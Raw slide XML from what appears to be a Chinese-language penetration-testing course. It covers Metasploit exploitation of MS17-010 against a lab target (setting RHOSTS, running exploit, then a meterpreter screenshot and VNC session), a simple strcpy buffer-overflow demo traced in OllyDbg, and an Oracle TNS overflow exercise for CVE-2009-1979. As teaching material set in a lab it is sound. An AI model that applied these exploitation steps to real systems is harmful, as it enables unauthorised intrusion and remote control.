          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="图片 58" descr="IMG_256"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2559685" y="2275205"/>
            <a:ext cx="6288405" cy="3073400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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46405" y="1674495"/>
            <a:ext cx="11490960" cy="55308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此处设置一下RHOSTS(靶机的ip地址)，使用set命令：set RHOSTS 192.168.56.132。如图5-59所示。</a:t>
            </a:r>
            <a:endParaRPr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962400" y="3042285"/>
            <a:ext cx="3838575" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-59 使用set命令设置RHOSTS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="图片 59" descr="IMG_256"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="2362200"/>
            <a:ext cx="6145530" cy="545465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3410585"/>
            <a:ext cx="9399270" cy="55308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设置完成之后，就可以开始攻击了，使用run或者exploit，如图5-60所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="图片 60" descr="IMG_256"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="4038600"/>
            <a:ext cx="5720080" cy="2337435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="6450965"/>
            <a:ext cx="4033520" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-60 使用exploit命令发起攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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066800" y="1676400"/>
            <a:ext cx="10718165" cy="1938020"/>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运行成功会出现meterpreter &gt;。Meterpreter 是 Metasploit 的一个扩展模块，可以调用 Metasploit 的一些功能，对目标系统进行更深入的渗透，如获取屏幕、上传/下载文件、创建持久后门等。这个时候我们已经成功了，远程命令执行。我们使用screenshot命令，获取靶机的屏幕截图如图5-61所示。</a:t>
            </a:r>
            <a:endParaRPr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962400" y="6400800"/>
            <a:ext cx="4225290" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-61 攻击成功获取到的靶机屏幕截图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="图片 61" descr="IMG_256"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="3630295"/>
            <a:ext cx="6254750" cy="2672080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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74495"/>
            <a:ext cx="10718165" cy="55308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还可以使用远程桌面命令：run vnc。如图5-62所示。</a:t>
            </a:r>
            <a:endParaRPr sz="200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505200" y="5562600"/>
            <a:ext cx="3838575" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-62 运行远程桌面命令run vnc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="图片 62" descr="IMG_256"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2362200"/>
            <a:ext cx="5916295" cy="2955925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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MS17_010漏洞利用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2.MS17_010漏洞利用项目实施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74495"/>
            <a:ext cx="10340975" cy="3322955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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help命令可以查看可以使用哪些命令。</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补充：</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（1）渗透攻击（Exploit）,指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞，所进行的攻击行为。</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（2）攻击载荷（Payload），是我们期望目标系统在被渗透攻击之后去执行的代码。</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buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>（3）模块（Module），指Metasploit框架中所使用的一段软件代码组件，可用于发起渗透攻击或执行某些辅助攻击动作。</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Oracle溢出漏洞利用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00200"/>
            <a:ext cx="10718165" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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 </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 文件名：overflow.cpp</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 功能：演示Windows缓冲区溢出的机制</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 </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#include &lt;stdio.h&gt;</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#include &lt;string.h&gt;</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char bigbuff[]=“aaaaaaaaaa";  // 10个a</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void main()</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   char smallbuff[5];  // 只分配了5字节的空间</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   strcpy(smallbuff,bigbuff);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">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Oracle溢出漏洞利用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5800" y="1524000"/>
            <a:ext cx="5159375" cy="444881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利用OllyDbg调试工具加载overflow.exe文件。</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OllyDbg调试工具的左上部分是反汇编编辑窗口，灰色选择部分就是main函数的反汇编代码，右上部分是寄存器窗口，左下部分是数据区窗口，现在00406030地址开始存在的是字符串bigbuff[]的数据，也就是10个a，右下部分是堆栈窗口，如图5-63所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="图片 63" descr="overflow3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="1447800"/>
            <a:ext cx="4147820" cy="4119245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="5791200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-63 利用OllyDbg调试工具加载overflow.exe文件</a:t>
            </a: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1808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metasploit简介</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524000" y="1981200"/>
            <a:ext cx="8682355" cy="2186940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825"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Metasploit统一了漏洞POC/EXP，简化繁琐环境要求，缩短学习曲线。它如同军火库，不断新增漏洞代码片段，使安全研究人员能轻松集成新武器。</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solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:cs typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              </a:rPr>
              <a:t>POC，全称为"ProofofConcept”，中文是“概念验证”，常指一段漏洞证明的代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="100000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:cs typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              </a:rPr>
              <a:t>EXP，全称”Exploit”，中文“利用”，指利用系统漏洞进行攻击的动作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:alpha val="100000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="AutoShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1160389" y="4272917"/>
            <a:ext cx="668149" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1109991" y="4272917"/>
            <a:ext cx="117156" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760312" y="4272917"/>
            <a:ext cx="117156" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828538" y="43436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47752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metasploit简介</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Oracle溢出漏洞利用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5800" y="1371600"/>
            <a:ext cx="6170295" cy="70612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调用strcpy()函数时堆栈的填充情况，如图5-64所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">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2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="2057400"/>
            <a:ext cx="4250055" cy="2877185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="5029200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-64 调用strcpy()函数时堆栈的填充情况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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Oracle溢出漏洞利用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5800" y="1371600"/>
            <a:ext cx="6170295" cy="70612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执行strcpy()函数的过程，如图5-65所示。</a:t>
            </a:r>
            <a:endParaRPr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800600" y="6096000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-65 执行strcpy()函数的过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="图片 101"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="2268220"/>
            <a:ext cx="7370445" cy="3760470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>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Oracle溢出漏洞利用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5800" y="1371600"/>
            <a:ext cx="6170295" cy="70612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溢出结果如图5-66所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="图片 66" descr="overflow4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="1905000"/>
            <a:ext cx="5043170" cy="3812540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="5867400"/>
            <a:ext cx="2608580" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-66 溢出结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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Oracle溢出漏洞利用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9600" y="1276350"/>
            <a:ext cx="11285220" cy="963295"/>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在右下部分的窗口，看到堆栈的填充情况，其中，由于windows平台，是以4个字节为单位进行内存管理的，所以系统为smallbuff变量申请了8个字节的空间，地址是从0012ff7c到0012ff84，这段空间也就是缓冲区，是预留给变量smallbuff使用，0012ff7c为堆的开始，0012ff84为堆的结束，在调用strcpy()函数前系统会自动将函数参数压入栈中，先压参数2，也就是字符串bigbuff的地址，再压参数1，就是字符串smallbuff的地址，而在堆栈下面，紧跟着的main函数的返回地址，存放在0012ff84中，字符串bigbuff的地址是指向存放静态数据“aaaaaaaaaa”的地址空间00406030，字符串smallbuff的地址指向堆栈中程序执行的smallbuff存放数据的空间0012ff7c。</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buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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Oracle溢出漏洞利用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85800" y="1371600"/>
            <a:ext cx="10724515" cy="82423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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在执行strcpy()函数时候，程序并没有做数组边界检查，它会直接把bigbuff中10个字节的数据，填入只有8个字节的缓冲区中，结果，缓冲器被字母“a”给填满了，还溢出覆盖了紧跟在缓冲区后面的main函数返回地址，现在的返回地址就被覆盖为00006161了。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【执行结果】最后，当main函数返回时，由于返回地址已经被覆盖了，指令指针EIP的内容变成了00006161，也就是说，程序下一步试图去执行内存地址00006161中的指令，而由于内地址00006161不可读，因此，main函数无法正常返回，程序无法正常执行下去，产生了缓冲区溢出。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上述的缓冲区溢出的例子中，只是出现了一般的拒绝服务的效果。</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5575935"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本项目设计对某公司渗透测试目标实验环境网络拓扑结构如图所示。包括了DMZ区（非军事区）与公司内网，其中的DMZ区部署了公司的门户网站服务器、后台服务器，并且为渗透测试提供了初始攻击点-BT55系统平台攻击机公司内网中包括安装Winxp系统并有无线网络接入的终端主机，实验环境拓扑如图5-67所示。实训目的为了掌握在Meterploit平台上溢出漏洞的渗透利用和机理分析；掌握Oracle数据库溢出漏洞案例，采覆盖异常处理结构SHE利用方式进行渗透攻击。</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1.分析缓冲区溢出任务</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79" name="图片 67" descr="image"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="2209800"/>
            <a:ext cx="5424805" cy="3598545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8534400" y="5943600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-67 实验环境拓扑图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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10458450"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在开始寻找相应的渗透利用代码之前，你首先对漏洞扫描软件给出的漏洞描述进行分析，这个 0racle 数据库 TNS 服务安全漏洞的编号是 CVE-2009-1979、OSVDB-59110。漏洞库CVE官方网站的描述链接为 http://cve.mitre.org/cgi-bin/cvenamecgi?name=CVE-2009-1979.由描述可知漏洞位于该服务的网络认证组件(Network Authentication component)，由于对一个AUTH SESSKEY 参数长度不恰当验证导致任意代码执行，允许攻击者远程渗透攻击，受影响的版本为 Oracle Database 10.1.0.5 至 10.2.0.4。对漏洞信息进行分析之后，你便祭出Metasploit框架软件，从中寻找对应的渗透利用代码。</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10458450"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1）启动虚拟机win2k3和虚拟机确保网络连通性</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首先需要确保win2k3与虚拟机BT5攻击机之间网络连通性，如图5-68所示。</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81" name="图片 68" descr="image (2)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="2743200"/>
            <a:ext cx="5777230" cy="2618105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="5486400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-68 测试win2k3与虚拟机BT5攻击机之间网络连通性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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10853420" cy="840740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="13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2）在虚拟机win2k3上启动Oracle服务</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="13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通过之前的情报搜集，已经确认目标服务器的操作系统是 Windows Server 2003Enterprise Edition SP0 英文版，安装 Oracle Database 10.2.0.1.0 Enterprise Edition，负责监听客户端连接的 OracleOraDb10g_homelTNSListenerORCL(ORCL是对应的数据库名称)服务开放在 1521 端口上。打开命令行执行命令，结果如图5-69所示。</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75" name="图片 69" descr="image (5)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3385185" y="3733800"/>
            <a:ext cx="5718810" cy="2733040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="6553200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-69 在虚拟机win2k3上启动Oracle服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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10458450"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3）打开攻击机虚拟机配置参数，如图5-70所示。</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505200" y="6400800"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-70 打开攻击机虚拟机配置参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="图片 70" descr="3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="2286000"/>
            <a:ext cx="4889500" cy="4025900"/>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180877"/>
            <a:ext cx="7648170" cy="725805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <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模块介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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066800" y="1828800"/>
            <a:ext cx="10587990" cy="668655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
